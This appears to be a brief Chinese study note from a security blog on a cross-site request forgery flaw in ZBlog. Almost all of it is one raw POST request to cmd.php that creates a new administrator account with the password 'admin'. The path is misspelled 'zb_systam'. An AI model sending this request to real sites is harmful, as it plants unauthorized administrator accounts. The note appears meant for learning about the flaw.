【笔记】ZBlog的CSRF跨站请求伪造

发表于 2024-05-16 更新于 2025-12-19 阅读次数：

前言

ZBlog的CSRF跨站请求伪造

正文

request

POST http://example/zb_systam/cmd.php?act=MemberPst&csrfToken=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Content-Type: application/x-www-form-urlencoded
Referer: http://example/zb_systam/cmd.php

ID=0&Level=1&Status=0&Name=admin&Password=admin&PassRe=admin&Alias=&Email=admin@example.com&HomePage=&Intro=&Template=index

完成

参考文献

哔哩哔哩——xiaodisec